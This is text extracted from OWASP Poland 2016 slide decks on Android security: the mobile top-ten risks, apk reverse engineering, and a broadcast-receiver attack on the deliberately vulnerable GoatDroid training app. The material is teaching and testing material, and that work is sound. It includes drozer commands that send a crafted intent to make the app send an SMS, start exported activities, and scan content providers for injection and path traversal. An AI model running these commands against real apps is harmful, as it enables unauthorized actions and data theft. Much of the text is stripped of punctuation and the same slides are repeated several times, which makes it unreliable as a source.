ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
